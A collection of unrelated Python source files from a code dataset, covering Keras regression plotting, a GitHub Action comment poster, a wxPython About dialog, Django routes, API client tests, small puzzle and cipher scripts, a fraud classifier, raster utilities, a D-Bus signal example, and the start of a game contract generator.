  plt.figure(figsize=(10,10))\n    for i in range(25):\n        plt.subplot(5,5,i+1)\n        plt.xticks([])\n        plt.yticks([])\n        plt.grid(False)\n        plt.imshow(x[i], cmap=plt.cm.binary)\n        plt.xlabel(y[i])\n    plt.show()\n\ndef plot_stat_loss_vs_time(history_dict) :\n    acc = history_dict['acc']\n    val_acc = history_dict['val_acc']\n    loss = history_dict['loss']\n    val_loss = history_dict['val_loss']\n\n    epochs = range(1, len(acc) + 1)\n\n    # \"bo\" is for \"blue dot\"\n    plt.plot(epochs, loss , 'bo', label='Training loss')\n    # b is for \"solid blue line\"\n    plt.plot(epochs, val_loss, 'b', label='Validation loss')\n    plt.title('Training and validation loss over time')\n    plt.xlabel('Epochs')\n    plt.ylabel('Loss')\n    plt.legend()\n    plt.show()\n\ndef plot_stat_accuracy_vs_time(history_dict) :\n    acc = history_dict['acc']\n    val_acc = history_dict['val_acc']\n    loss = history_dict['loss']\n    val_loss = history_dict['val_loss']\n    epochs = range(1, len(acc) + 1)\n\n    plt.plot(epochs, acc , 'bo', label='Training acc')\n    plt.plot(epochs, val_acc, 'b' , label='Validation acc')\n    plt.title('Training and validation accuracy over time')\n    plt.xlabel('Epochs')\n    plt.ylabel('Accuracy')\n    plt.legend()\n\n    plt.show()\n\n\ndef plot_stat_train_vs_test(history):\n    hist = history.history\n    plt.xlabel('Epoch')\n    plt.ylabel('Error')\n    plt.plot(hist['loss'])\n    plt.plot(hist['val_loss'])\n    plt.title ('model loss')\n    plt.legend (['train Error', 'test Error'], loc='upper right')\n    plt.show()\n\n\n# normalize to first row\ndef normalize(df):\n    return df/df.iloc[0,:]\n\n\ndef normalize_zscore(x):\n    # renamed from a second `normalize` definition that shadowed the one above;\n    # it also referenced an undefined x_train, so the stats are now taken from x itself\n    train_stats = x.describe()\n    return (x - train_stats['mean']) / train_stats['std']\n\n\ndef 
symbol_to_path(symbol, base_dir=\"\"):\n \"\"\"Return CSV file path given ticker symbol.\"\"\"\n return os.path.join(base_dir, \"{}.csv\".format(str(symbol)))\n\n\ndef get_data_from_disc(symbols, dates):\n \"\"\"Read stock data (adjusted close) for given symbols from CSV files.\"\"\"\n df = pd.DataFrame(index=dates)\n if 'GOOG' not in symbols: # add GOOG for reference, if absent\n symbols.insert(0, 'GOOG')\n\n for symbol in symbols:\n df_temp = pd.read_csv(symbol_to_path(symbol), index_col='Date',\n parse_dates=True, usecols=['Date', 'Adj Close'], na_values=['nan'])\n\n df_temp = df_temp.rename(columns={'Adj Close': symbol})\n print(df_temp.head())\n df = df.join(df_temp)\n if symbol == 'GOOG': # drop dates GOOG did not trade\n df = df.dropna(subset=[\"GOOG\"])\n\n return df\n\ndef get_data_from_web(symbol):\n start, end = '2007-05-02', '2016-04-11'\n data = web.DataReader(symbol, 'yahoo', start, end)\n data=pd.DataFrame(data)\n prices=data['Adj Close']\n prices=prices.astype(float)\n return prices\n\n\ndef get_state(parameters, t, window_size = 20):\n outside = []\n d = t - window_size + 1\n for parameter in parameters:\n block = (\n parameter[d : t + 1]\n if d >= 0\n else -d * [parameter[0]] + parameter[0 : t + 1]\n )\n res = []\n for i in range(window_size - 1):\n res.append(block[i + 1] - block[i])\n for i in range(1, window_size, 1):\n res.append(block[i] - block[0])\n outside.append(res)\n return np.array(outside).reshape((1, -1))\n\n## Set the mean, standard deviation, and size of the dataset, respectively\nmu, sigma, size = 0, 4, 100\n\n## Set the slope (m) and y-intercept (b), respectively\nm, b = 2, 100\n\n## Create a uniformally distributed set of X values between 0 and 10 and store in pandas dataframe\nx = np.random.uniform(0,10, size)\ndf = pd.DataFrame({'x':x})\n\n## Find the \"perfect\" y value corresponding to each x value given\ndf['y_perfect'] = df['x'].apply(lambda x: m*x+b)\n\n\n## Create some noise and add it to each \"perfect\" y value to create a realistic y dataset\ndf['noise'] = np.random.normal(mu, sigma, size=(size,))\ndf['y'] = df['y_perfect']+df['noise']\n\n## Plot our noisy dataset with a standard linear regression\n## (note seaborn, the plotting library, does the linear regression by default)\nax1 = sns.regplot(x='x', y='y', data=df)\n\nprint ('\\ndata = ',df)\n\n\n## Create our model with a single dense layer, with a linear activation function and glorot (Xavier) input normalization\nprint('\\ncreate model...')\n#model = Sequential([Dense(1, activation='linear', input_shape=(1,), kernel_initializer='glorot_uniform')])\n\nmodel = Sequential()# stack of layers\nmodel.add(Dense (1, activation='linear', input_shape=(1,), kernel_initializer='glorot_uniform'))\nmodel.summary()\n## Compile our model using the method of least squares (mse) loss function\n## and a stochastic gradient descent (sgd) optimizer\nmodel.compile( loss ='mse'\n , optimizer='sgd') ## To try our model with an Adam optimizer simple replace 'sgd' with 'Adam'\n\n## Set our learning rate to 0.01 and print it\n#model.optimizer.lr.set_value(.001)\n#print ('optimizer=',model.optimizer.lr.get_value())\n\n## Fit our model to the noisy data we create above. 
Notes:\n## The validation split parameter reserves 20% of our data for validation (ie 80% will be used for training)\n## The callback parameter is where we tell our model to use the callback function created above\n## I don't really know if using a batch size of 1 makes sense\nhistory = model.fit( x=df['x']\n , y=df['y']\n , validation_split= 0.2\n , batch_size = 1\n , epochs = 100\n # , callbacks=[print_save_weights]\n )\n\n## As the model is fitting the data you can watch below and see how our m and b parameters are improving\n\n## Save and print our final weights\npredicted_m = model.get_weights()[0][0][0]\npredicted_b = model.get_weights()[1][0]\nprint (\"\\nm=%.2f b=%.2f\\n\" % (predicted_m, predicted_b))#m=2.45 b=99.48\n\nplot_stat_train_vs_test(history)\n\n# Plot our model's prediction over the data and real line\n## Create our predicted y's based on the model\ndf['y_predicted'] = df['x'].apply(lambda x: predicted_m*x + predicted_b)\n## Plot the original data with a standard linear regression\nax1 = sns.regplot(x='x', y='y', data=df, label='real')\n\n## Plot our predicted line based on our Keras model's slope and y-intercept\nax2 = sns.regplot(x='x', y='y_predicted', data=df, scatter=False, label='predicted')\nax2.legend(loc=\"upper left\")\n\n\n\n\n\n","sub_path":"examples/mnist_linear_reg.py","file_name":"mnist_linear_reg.py","file_ext":"py","file_size_in_byte":8477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"621008800","text":"import asyncio\nimport os\nimport json\nfrom aiogithubapi import GitHub\nfrom aiogithubapi.common.const import BASE_API_HEADERS, BASE_API_URL\n\nIDENTIFIER = \"\"\nHEADER = \"🎉 **HACS repository validator action summary** 🎉\"\n\n\ndef get_token():\n with open(f\"{os.getenv('GITHUB_ACTION_PATH')}/data/token\", \"r\") as token:\n return token.read().replace(\"\\n\", \"\")\n\n\ndef get_event():\n with open(os.getenv('GITHUB_EVENT_PATH'), \"r\") as event:\n return event.read()\n\n\ndef get_result():\n with open(f\"{os.getenv('GITHUB_ACTION_PATH')}/result\", \"r\") as result:\n return result.read()\n\n\nasync def post():\n event = json.loads(get_event())\n if not event.get('pull_request'):\n return\n\n async with GitHub(get_token()) as github:\n name = event[\"repository\"][\"full_name\"]\n number = event[\"pull_request\"][\"number\"]\n msg = f\"{HEADER}\\n{get_result()}\\n\\n{IDENTIFIER}\"\n\n _headers = BASE_API_HEADERS\n _headers[\"Authorization\"] = f\"token {github.client.token}\"\n _endpoint = f\"{BASE_API_URL}/repos/{name}/issues/{number}/comments\"\n\n request = await github.client.session.get(_endpoint, headers=_headers)\n comments = await request.json()\n for comment in comments:\n if IDENTIFIER in comment[\"body\"] and comment[\"user\"][\"login\"] == 'github-actions[bot]':\n _endpoint = f\"{BASE_API_URL}/repos/{name}/issues/comments/{comment['id']}\"\n result = await github.client.session.patch(_endpoint, json={\"body\": msg}, headers=_headers)\n if result.status != 200:\n if result.reason != \"Forbidden\":\n print(_endpoint)\n print(result.reason)\n exit(1)\n return\n\n result = await github.client.session.post(_endpoint, json={\"body\": msg}, headers=_headers)\n if result.status != 201:\n if result.reason != \"Forbidden\":\n print(_endpoint)\n print(result.reason)\n 
exit(1)\n\n\nasyncio.get_event_loop().run_until_complete(post())\n","sub_path":"helpers/post_result.py","file_name":"post_result.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"88029951","text":"## -*- coding: utf-8 -*-\n# Copyright © 2011-2012 Mike Fled \n\nimport wx\n\nfrom configobj import __version__ as version_configobj\nfrom Crypto import __version__ as version_pycrypto\nfrom platform import python_version as version_python\nfrom psutil import __version__ as version_psutil\nfrom wx import __version__ as version_wxpython\nfrom yarest import __version__ as version_yarest\n\ntry:\n from ssh import __version__ as version_sshlib\nexcept ImportError:\n from paramiko import __version__ as version_sshlib\n\nfrom ._constants import APP_NAME, BLANK_LINES, RESIZE_NO, RESIZE_OK, UTF8\nfrom ._docs import license, acknowledgements\nfrom ._images import logo_128\nfrom ._messages import (label_about, label_acknowledgements, label_license,\n label_version, label_versions, label_website)\n\n\n# layout variables\nheader_flags = wx.ALIGN_CENTER | wx.ALL\n\nlogo_flags = wx.ALIGN_RIGHT | wx.ALL\nlogo_height = 128\nlogo_width = 128\n\ntabs_height = 256\ntabs_width = 512\n\nurl_flags = wx.ALIGN_LEFT | wx.ALIGN_TOP | wx.LEFT | wx.RIGHT | wx.TOP\nversion_flags = wx.ALIGN_LEFT | wx.ALIGN_TOP | wx.LEFT | wx.RIGHT | wx.TOP\nwidget_padding = 7\n\nclass AboutWindow (wx.Dialog):\n def __init__(self, parent):\n wx.Dialog.__init__(self, parent, wx.ID_ANY, label_about % (APP_NAME),\n style=wx.CLOSE_BOX | wx.MINIMIZE_BOX)\n self.Bind(wx.EVT_CLOSE, self._on_close)\n\n # inner layout sizers\n headersizer = wx.BoxSizer(wx.HORIZONTAL)\n header_textsizer = wx.BoxSizer(wx.VERTICAL)\n header_logosizer = wx.BoxSizer(wx.VERTICAL)\n tabsizer = wx.BoxSizer(wx.HORIZONTAL)\n footersizer = wx.BoxSizer(wx.HORIZONTAL)\n\n # header text\n desc = wx.StaticText(self, wx.ID_ANY, \"Yet Another REmote Support Tool\")\n self._set_font_bold(desc)\n header_textsizer.Add(desc, RESIZE_NO, header_flags, widget_padding)\n\n version = wx.StaticText(self, wx.ID_ANY,\n label_version + \" \" + version_yarest)\n header_textsizer.Add(version, RESIZE_NO, header_flags, widget_padding)\n\n url = wx.HyperlinkCtrl(self, wx.ID_ANY, label_website,\n \"http://code.google.com/p/yarest/\")\n header_textsizer.Add(url, RESIZE_NO, header_flags, widget_padding)\n\n headersizer.Add(header_textsizer, RESIZE_NO, wx.ALL, widget_padding)\n\n # header logo\n image = wx.StaticBitmap(self, wx.ID_ANY, logo_128.GetBitmap())\n header_logosizer.Add(image, RESIZE_NO, logo_flags, widget_padding)\n\n headersizer.Add(header_logosizer, RESIZE_NO, logo_flags, widget_padding)\n\n # notebook tabs\n notebook = wx.Notebook(self, size=(tabs_width, tabs_height))\n\n acknowledge_tab = _AcknowledgementsPanel(notebook)\n license_tab = _LicensePanel(notebook)\n versions_tab = _VersionsPanel(notebook)\n\n notebook.AddPage(acknowledge_tab, label_acknowledgements)\n notebook.AddPage(license_tab, label_license)\n notebook.AddPage(versions_tab, label_versions)\n\n tabsizer.Add(notebook, RESIZE_NO, wx.ALL, widget_padding)\n\n # footer\n okbutton = wx.Button(self, wx.ID_OK)\n wx.EVT_BUTTON(self, wx.ID_OK, self._on_close)\n footersizer.Add(okbutton, RESIZE_NO, wx.ALL, widget_padding)\n\n # add inner sizers to outer sizer\n outersizer = wx.BoxSizer(wx.VERTICAL)\n outersizer.Add(headersizer, RESIZE_NO, wx.ALIGN_CENTER)\n outersizer.Add(tabsizer, RESIZE_NO, wx.ALIGN_CENTER)\n outersizer.Add(footersizer, 
RESIZE_NO, wx.ALIGN_RIGHT)\n\n # resize and theme the window\n self.SetIcon(parent.GetIcon())\n self.SetSizerAndFit(outersizer)\n self.SetThemeEnabled(True)\n\n def _on_close(self, event):\n self.Destroy()\n\n def _set_font_bold(self, widget):\n font = widget.GetFont()\n font.SetWeight(wx.BOLD)\n widget.SetFont(font)\n\n\nclass _AcknowledgementsPanel (wx.Panel):\n def __init__(self, parent):\n wx.Panel.__init__(self, parent)\n data = wx.TextCtrl(self, wx.ID_ANY, acknowledgements.encode(UTF8),\n style=wx.TE_MULTILINE | wx.TE_READONLY)\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(data, RESIZE_OK, wx.EXPAND)\n self.SetSizer(sizer)\n\n\nclass _LicensePanel (wx.Panel):\n def __init__(self, parent):\n wx.Panel.__init__(self, parent)\n data = wx.TextCtrl(self, wx.ID_ANY, license.encode(UTF8),\n style=wx.TE_MULTILINE | wx.TE_READONLY)\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(data, RESIZE_OK, wx.EXPAND)\n self.SetSizer(sizer)\n\n\nclass _VersionsPanel (wx.Panel):\n def __init__(self, parent):\n wx.Panel.__init__(self, parent)\n\n gridsizer = wx.FlexGridSizer(rows=0, cols=2, vgap=0, hgap=0)\n\n url = wx.HyperlinkCtrl(self, wx.ID_ANY, \"Python\",\n \"http://www.python.org/\")\n version = wx.StaticText(self, wx.ID_ANY, version_python())\n gridsizer.Add(url, RESIZE_NO, url_flags, widget_padding)\n gridsizer.Add(version, RESIZE_NO, version_flags, widget_padding)\n\n url = wx.HyperlinkCtrl(self, wx.ID_ANY, \"wxPython\",\n \"http://www.wxpython.org/\")\n version = wx.StaticText(self, wx.ID_ANY, version_wxpython)\n gridsizer.Add(url, RESIZE_NO, url_flags, widget_padding)\n gridsizer.Add(version, RESIZE_NO, version_flags, widget_padding)\n\n url = wx.HyperlinkCtrl(self, wx.ID_ANY, \"PyCrypto\",\n \"http://www.pycrypto.org/\")\n version = wx.StaticText(self, wx.ID_ANY, version_pycrypto)\n gridsizer.Add(url, RESIZE_NO, url_flags, widget_padding)\n gridsizer.Add(version, RESIZE_NO, version_flags, widget_padding)\n\n url = wx.HyperlinkCtrl(self, wx.ID_ANY, \"ssh/Paramiko\",\n \"https://github.com/bitprophet/ssh/\")\n version = wx.StaticText(self, wx.ID_ANY, version_sshlib)\n gridsizer.Add(url, RESIZE_NO, url_flags, widget_padding)\n gridsizer.Add(version, RESIZE_NO, version_flags, widget_padding)\n\n url = wx.HyperlinkCtrl(self, wx.ID_ANY, \"ConfigObj\",\n \"http://www.voidspace.org.uk/python/configobj.html\")\n version = wx.StaticText(self, wx.ID_ANY, version_configobj)\n gridsizer.Add(url, RESIZE_NO, url_flags, widget_padding)\n gridsizer.Add(version, RESIZE_NO, version_flags, widget_padding)\n\n url = wx.HyperlinkCtrl(self, wx.ID_ANY, \"psutil\",\n \"http://code.google.com/p/psutil/\")\n version = wx.StaticText(self, wx.ID_ANY, version_psutil)\n gridsizer.Add(url, RESIZE_NO, url_flags, widget_padding)\n gridsizer.Add(version, RESIZE_NO, version_flags, widget_padding)\n\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(gridsizer, RESIZE_OK, wx.EXPAND)\n self.SetSizer(sizer)\n","sub_path":"yarest/gui/_about.py","file_name":"_about.py","file_ext":"py","file_size_in_byte":6953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"589596735","text":"from django.conf.urls import include, url\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nfrom django.contrib import admin\n\nfrom cornerwise.views import index, contact_us\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n url(r'^parcel/', include(\"parcel.urls\")),\n url(r'^project/', include(\"project.urls\")),\n url(r'^proposal/', include(\"proposal.urls\")),\n 
url(r\"^doc/\", include(\"proposal.doc_urls\")),\n url(r\"^task/\", include(\"task.urls\")),\n url(r\"^user/\", include(\"user.urls\")),\n url(r\"^contact$\", contact_us, name=\"contact-us\"),\n url(r\"^$\", index, name=\"front-page\"),\n]\n\nif settings.SERVE_MEDIA:\n urlpatterns += static(\n settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nif settings.SERVE_STATIC:\n urlpatterns += static(\n settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n","sub_path":"server/cornerwise/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"185998270","text":"from unittest.mock import Mock\n\nimport pytest\n\nfrom linnapi.requests import inventory\n\n\n@pytest.fixture\ndef image_id():\n return \"eea21827-491d-4022-996a-d068dd6b25ea\"\n\n\n@pytest.fixture\ndef stock_item_id():\n return \"972af264-d768-4c6c-9152-0ad9d9d5b352\"\n\n\n@pytest.fixture\ndef sort_order():\n return 5\n\n\n@pytest.fixture\ndef kwargs(image_id, stock_item_id, sort_order):\n return {\n \"row_id\": image_id,\n \"stock_item_id\": stock_item_id,\n \"sort_order\": sort_order,\n \"is_main\": True,\n }\n\n\ndef test_update_images_url():\n url = \"https://eu-ext.linnworks.net/api/Inventory/UpdateImages\"\n assert inventory.UpdateImages.URL == url\n\n\ndef test_update_images_method():\n assert inventory.UpdateImages.METHOD == \"POST\"\n\n\ndef test_update_images_multi_headers(kwargs):\n assert inventory.UpdateImages.headers([kwargs]) == {}\n\n\ndef test_update_images_multi_params(kwargs):\n assert inventory.UpdateImages.params([kwargs]) is None\n\n\ndef test_update_images_multi_data(kwargs):\n assert inventory.UpdateImages.multi_data([kwargs]) is None\n\n\ndef test_update_images_multi_json(kwargs, stock_item_id, image_id, sort_order):\n expected_response = {\n \"images\": [\n {\n \"pkRowId\": image_id,\n \"StockItemId\": stock_item_id,\n \"IsMain\": True,\n \"SortOrder\": sort_order,\n }\n ]\n }\n assert inventory.UpdateImages.multi_json([kwargs]) == expected_response\n\n\ndef test_update_images_multi_json_with_multiple_requests(\n kwargs, stock_item_id, image_id, sort_order\n):\n expected_response = {\n \"images\": [\n {\n \"pkRowId\": image_id,\n \"StockItemId\": stock_item_id,\n \"IsMain\": True,\n \"SortOrder\": sort_order,\n },\n {\n \"pkRowId\": image_id,\n \"StockItemId\": stock_item_id,\n \"IsMain\": True,\n \"SortOrder\": sort_order,\n },\n {\n \"pkRowId\": image_id,\n \"StockItemId\": stock_item_id,\n \"IsMain\": True,\n \"SortOrder\": sort_order,\n },\n ]\n }\n assert (\n inventory.UpdateImages.multi_json([kwargs, kwargs, kwargs]) == expected_response\n )\n\n\ndef test_update_images_multi_parse_response(kwargs):\n response = Mock()\n response.text = \"Test Text\"\n assert inventory.UpdateImages.parse_response(response, [kwargs]) == response.text\n","sub_path":"tests/test_requests/test_inventory_requests/test_update_images.py","file_name":"test_update_images.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"191769782","text":"import os\r\n\r\nCUR_DIR_ABS_PATH = os.path.dirname(os.path.abspath(__file__))\r\nINPUT_FILE_NAME = '03_input.txt'\r\nINPUT_FILE_PATH = os.path.join(CUR_DIR_ABS_PATH, INPUT_FILE_NAME) \r\nSLOPES = [(1,1), (1,3), (1,5), (1,7), (2,1)]\r\n\r\ndef find_trees(row_step, col_step, map):\r\n width = len(map[0]) - 1\r\n height = len(map)\r\n row = 0\r\n col = 0\r\n trees = 0\r\n\r\n 
while row + 1 < height:\r\n col += col_step\r\n row += row_step\r\n if map[row][col%width] == '#':\r\n trees += 1\r\n return trees\r\n\r\nif __name__ == '__main__': \r\n with open(INPUT_FILE_PATH, 'r') as input_file:\r\n map = []\r\n for line in input_file:\r\n map.append(line)\r\n input_file.close()\r\n answer = 1\r\n for slope in SLOPES:\r\n answer *= find_trees(*slope, map)\r\n print(answer)\r\n","sub_path":"day_03_toboggan_trajectory/03_main.py","file_name":"03_main.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"570551398","text":"from AutoEncoder.VAE.vae import VAE\r\nfrom AutoEncoder.VAE.data import Data\r\nfrom AutoEncoder.VAE.learner import Learner\r\nfrom AutoEncoder.VAE.visualizer import Visualizer\r\n\r\nif __name__ == '__main__':\r\n DATA_DIR = 'D:/rawDataFiles/digit_train.csv'\r\n\r\n LEARNING_RATE = 0.0005\r\n EPOCHS = 500\r\n BATCH_SIZE = 3000\r\n\r\n data = Data(DATA_DIR)\r\n target, input = data.import_data()\r\n vae = VAE(LEARNING_RATE)\r\n target = target.to(vae.device)\r\n input = input.to(vae.device)\r\n print(target.shape)\r\n print(input.shape)\r\n\r\n learner = Learner(vae, input, target, batch_size=BATCH_SIZE, epochs=EPOCHS)\r\n model = learner.learn()\r\n\r\n viz = Visualizer(target, model)\r\n viz.viz()\r\n","sub_path":"AutoEncoders/beta_VAE/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"375797752","text":"#!/usr/bin/env python3\n\ntext_space = \"abcdefghijklmnopqrstuvwxyz\"\n\nplain_text = input(\"Enter message, for example HELLO: \").lower()\nshift = int(input(\"Enter shift, for example 6: \"))\n \nlength = len(plain_text)\ncipher_text = \"\"\n\nfor index in range(length):\n letter = plain_text[index]\n init_pos = text_space.find(letter)\n if init_pos < 0:\n cipher_text += \" \"\n else:\n letter_shift = (init_pos + shift) % 26\n cipher_text += text_space[letter_shift]\n \nprint(\"Cipher text: \", cipher_text)\n\n","sub_path":"caesarCipher/caesar_cipher.py","file_name":"caesar_cipher.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"333677850","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn.metrics import precision_score, recall_score\nimport pickle\nfrom bs4 import BeautifulSoup\n\n# read data into df\ndef data_to_df():\n df = pd.read_json('data/data.json')\n return df\n\n# add y-value column\ndef add_fraud(df):\n df['fraud'] = df['acct_type'].apply(lambda x: True if x in [u'fraudster_event', u'fraudster', u'fraudster_att'] else False)\n # df.drop('acct_type', axis=1, inplace=True)\n\n# unpack ticket info\ndef unpack_tix(df):\n cost = []\n quantity_sold = []\n quantity_total = []\n\n for i in range(len(df['ticket_types'])):\n line_cost = []\n line_quant = []\n line_total = []\n for j in range(len(df['ticket_types'].values[i])):\n line_cost.append(df['ticket_types'].values[i][j]['cost'])\n line_quant.append(df['ticket_types'].values[i][j]['quantity_sold'])\n line_total.append(df['ticket_types'].values[i][j]['quantity_total'])\n cost.append(line_cost)\n quantity_sold.append(line_quant)\n quantity_total.append(line_total)\n\n df['cost'] = cost\n df['quantity_sold'] = 
quantity_sold\n df['quantity_total'] = quantity_total\n\n# unpack descriptions into numpy arrays\ndef desc_to_nump(df):\n X = df['description'].values\n y = df['fraud'].values\n # #less effective\n # for i,row in enumerate(X):\n # soup = BeautifulSoup(row,'html.parser')\n # X[i] = soup.get_text()\n return X,y\n\n# create TF-IDF Vectorizer\ndef build_model(X_train,y_train):\n tf = TfidfVectorizer() #stop_words='english'\n bnb = BernoulliNB()\n X_tran = tf.fit_transform(X_train)\n bnb.fit(X_tran,y_train)\n return tf,bnb\n\n# score model on test sample\ndef score_train_test(tf,bnb, X_train, X_test, y_train, y_test):\n X_tran_tr = tf.transform(X_train)\n y_proba = bnb.predict_proba(X_tran_tr)\n y_pred_tr = np.empty_like(y_train)\n for i,row in enumerate(y_pred_tr):\n if i in np.where(y_proba[:,1]>.00001)[0]:\n y_pred_tr[i] = True\n else:\n y_pred_tr[i] = False\n print(\"train recall: {}\".format(recall_score(y_train,y_pred_tr)))\n print(\"train precision: {}\".format(precision_score(y_train,y_pred_tr)))\n print('size: {}'.format(y_pred_tr.sum()))\n\n X_tran_te = tf.transform(X_test)\n y_proba = bnb.predict_proba(X_tran_te)\n y_pred_te = np.empty_like(y_test)\n for i,row in enumerate(y_pred_te):\n if i in np.where(y_proba[:,1]>.00001)[0]:\n y_pred_te[i] = True\n else:\n y_pred_te[i] = False\n print(\"test recall: {}\".format(recall_score(y_test,y_pred_te)))\n print(\"test precision: {}\".format(precision_score(y_test,y_pred_te)))\n print('size: {}'.format(y_pred_te.sum()))\n pass\n\n# pickle models\ndef pickle_models(tf,bnb):\n with open('tf.pickle', 'wb') as handle:\n pickle.dump(tf, handle, protocol=pickle.HIGHEST_PROTOCOL)\n with open('bnb.pickle', 'wb') as handle2:\n pickle.dump(bnb, handle2, protocol=pickle.HIGHEST_PROTOCOL)\n\nif __name__ == '__main__':\n df = data_to_df()\n unpack_tix(df)\n add_fraud(df)\n X, y = desc_to_nump(df)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.20, random_state=42)\n tf,bnb = build_model(X_train,y_train)\n score_train_test(tf,bnb, X_train, X_test, y_train, y_test)\n pickle_models(tf,bnb)\n","sub_path":"src/description_pred_model.py","file_name":"description_pred_model.py","file_ext":"py","file_size_in_byte":3505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"428503566","text":"\"\"\"Useful functions for the carbon biophysical and valuation models.\"\"\"\n\nimport os\nimport logging\n\nfrom osgeo import gdal\nimport numpy\n\nLOGGER = logging.getLogger('natcap.invest.carbon.utils')\n\ndef make_suffix(model_args):\n '''Return the suffix from the args (prepending '_' if necessary).'''\n try:\n file_suffix = model_args['suffix']\n if not file_suffix.startswith('_'):\n file_suffix = '_' + file_suffix\n except KeyError:\n file_suffix = ''\n return file_suffix\n\n\ndef setup_dirs(workspace_dir, *dirnames):\n '''Create the requested directories, and return the pathnames.'''\n dirs = {name: os.path.join(workspace_dir, name) for name in dirnames}\n for new_dir in dirs.values():\n if not os.path.exists(new_dir):\n LOGGER.debug('Creating directory %s', new_dir)\n os.makedirs(new_dir)\n if len(dirs) == 1:\n return next(iter(dirs.values())) # dict views are not indexable in Python 3\n return dirs\n\n\ndef sum_pixel_values_from_uri(uri):\n '''Return the sum of the values of all pixels in the given file.'''\n dataset = gdal.Open(uri)\n band = dataset.GetRasterBand(1)\n nodata = band.GetNoDataValue()\n total_sum = 0.0\n # Loop over each row in out_band\n for row_index in range(band.YSize):\n row_array = band.ReadAsArray(0, row_index, 
band.XSize, 1)\n total_sum += numpy.sum(row_array[row_array != nodata])\n return total_sum\n","sub_path":"natcap/invest/carbon/carbon_utils.py","file_name":"carbon_utils.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"105073007","text":"#!/usr/bin/env python\n#\n# This file is part of python-tdbus. Python-tdbus is free software\n# available under the terms of the MIT license. See the file \"LICENSE\" that\n# was provided together with this source file for the licensing terms.\n#\n# Copyright (c) 2012 the python-tdbus authors. See the file \"AUTHORS\" for a\n# complete list.\n\n\n# This example shows how to listen for signals. Here we listen for any signal named \"Hello\" on interface\n# com.example.Hello but signal_handler() also accepts keyword arguments to only listen for\n# specific signals.\n\nfrom __future__ import print_function, unicode_literals\nfrom __future__ import division, absolute_import\n\nimport sys\nimport tdbus\n\nimport gevent\n\nif not hasattr(tdbus, 'GEventDBusConnection'):\n print('gevent is not available on this system')\n sys.exit(1)\n\nfrom tdbus import GEventDBusConnection, DBUS_BUS_SESSION, signal_handler, DBusHandler, method\n\n\nclass GEventHandler(DBusHandler):\n\n @signal_handler(interface=\"com.example.Hello\")\n def Hello(self, message):\n print('signal received: %s, args = %s' % (message.get_member(), repr(message.get_args())))\n\n @method(interface=\"com.example.Hello\")\n def HelloMethod(self, message):\n print('signal received: %s, args = %s' % (message.get_member(), repr(message.get_args())))\n\n @method(interface=\"org.freedesktop.DBus.Introspectable\")\n def Introspect(self, message):\n \"\"\"Return DBus introspection data for debugging\n\n @see: http://dbus.freedesktop.org/doc/dbus-specification.html#introspection-format\n \"\"\"\n if message.get_path() == '/':\n xml = \"\"\"\n\n \n\"\"\"\n\n else:\n xml = \"\"\"\n \n \n \n \n \n \n \n \n \n \"\"\"\n\n self.set_response(\"s\", [xml])\n\nconn = GEventDBusConnection(DBUS_BUS_SESSION)\nhandler = GEventHandler()\nconn.add_handler(handler)\n\nprint('Listening for signals, with gevent dispatcher.')\nprint('In another terminal, issue:')\nprint()\nprint(' $ dbus-send --session --type=signal --dest={} /com/example/TDBus com.example.Hello.Hello'.format(conn.get_unique_name()))\nprint(' $ dbus-send --session --print-reply --type=method_call --dest={} /com/example/TDBus com.example.Hello.HelloMethod'.format(conn.get_unique_name()))\nprint()\nprint('Press CTRL-c to exit.')\nprint()\n\n\nfrom gevent.hub import get_hub\ntry:\n get_hub().switch()\nexcept KeyboardInterrupt:\n pass\n\n","sub_path":"examples/dispatch_gevent.py","file_name":"dispatch_gevent.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"574499678","text":"import random\n\ndef proofType():\n p = ['Head', 'Arm', 'Leg', 'Tooth', 'Lock of Hair', 'Ring', 'Any', 'Armor']\n p = random.choice(p)\n return p\n\ndef killType():\n t = ['Look like an accident', 'brutal public murder', 'silent assassination', 'sabotage']\n t = random.choice(t)\n t = t.title()\n return t\n\ndef weaponUsed():\n w = ['poison', 'simple melee weapon', 'simple ranged weapon',\n 'martial melee weapon', 'martial ranged weapon', 'any']\n w = random.choice(w)\n w = w.title()\n return w\n\ndef guardKill():\n g = ['Yes','No']\n g = random.choice(g)\n return g\n\ndef Objectives():\n g = 
